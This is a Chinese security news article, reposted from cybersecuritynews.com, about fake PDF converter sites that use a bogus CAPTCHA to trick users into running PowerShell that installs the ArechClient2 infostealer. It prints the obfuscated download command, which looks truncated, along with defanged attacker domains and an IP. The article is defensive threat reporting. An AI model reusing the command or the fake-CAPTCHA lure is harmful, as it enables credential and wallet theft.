当心在线PDF转换器诱骗用户安装窃取密码的恶意软件

admin 2025年4月23日01:27:27评论20 views字数 1257阅读4分11秒阅读模式

更多全球网络安全资讯尽在邑安全

当心在线PDF转换器诱骗用户安装窃取密码的恶意软件

网络犯罪分子发起了一项复杂的恶意软件活动,利用模仿流行的合法服务 PDFCandy 的虚假 PDF 到 DOCX 转换器网站。

恶意网站,包括 candyxpdf[.] 等域。com 和 CandyConverterPDF[.]com 部署了一种精心设计的社会工程策略,旨在从寻求转换文档格式的毫无戒心的用户那里收集敏感信息。

当用户尝试在这些欺诈平台上转换文档时,他们会看到一个看似合法的界面,其中包含动画加载序列和熟悉的转换选项。

上传文件后,受害者会遇到一个虚假的 CAPTCHA 验证,该验证指示他们按 Windows+R 并粘贴伪装的 PowerShell 命令。执行此命令时,会启动一个复杂的感染链,最终部署 ArechClient2 信息窃取程序。

CloudSEK 研究人员发现,该恶意软件是危险的 SectopRAT 家族的变体,该家族自 2019 年以来一直活跃。

他们的分析显示,该攻击采用了多阶段重定向过程,连接到“bind-new-connect[.]click“,然后下载托管在 IP 地址 172 上的恶意 ”adobe.zip“ 有效负载。86[.]115[.]43.

这种攻击的影响是严重的,因为该恶意软件专门设计用于从受感染的系统中收集浏览器凭据、加密货币钱包信息和其他敏感数据。

该感染展示了先进的规避技术,包括滥用合法的 Windows 实用程序来绕过安全控制。

当心在线PDF转换器诱骗用户安装窃取密码的恶意软件

恶意软件活动的思维导图

感染机制分析

此攻击的核心依赖于用户无意中执行的混淆 PowerShell 命令:-

powershell -win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgB1AHQALgBXAGUAYgBDAG8AYQBKAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ΘΑΥQANACKAIAB8ACAASQBFAHgA
当心在线PDF转换器诱骗用户安装窃取密码的恶意软件

audiobit.exe

此编码命令会发起一个 Web 请求来下载“adobe.zip”存档,其中包含多个文件,包括恶意的“audiobit[.]exe“ 可执行文件。

执行时,此文件会启动一个合法的 Windows 实用程序 MSBuild.exe,通过一种称为 living-off-the-land 的技术加载 ArechClient2 恶意软件。

该恶意软件执行多种可疑作,包括注册表查询、系统信息发现和凭据搜寻。

该恶意软件会访问机器 GUID、计算机名称并检查支持的语言,然后再继续收集敏感数据,包括存储的密码和加密货币钱包凭据。

建议用户仅使用来自官方来源的受信任的文件转换工具,并对任何请求命令行执行的网站保持警惕,无论界面看起来多么合法。

原文来自: cybersecuritynews.com

原文链接: https://cybersecuritynews.com/beware-of-online-pdf-converters-that-tricks-users/

原文始发于微信公众号(邑安全):当心在线PDF转换器诱骗用户安装窃取密码的恶意软件

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月23日01:27:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   当心在线PDF转换器诱骗用户安装窃取密码的恶意软件https://cn-sec.com/archives/3969502.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息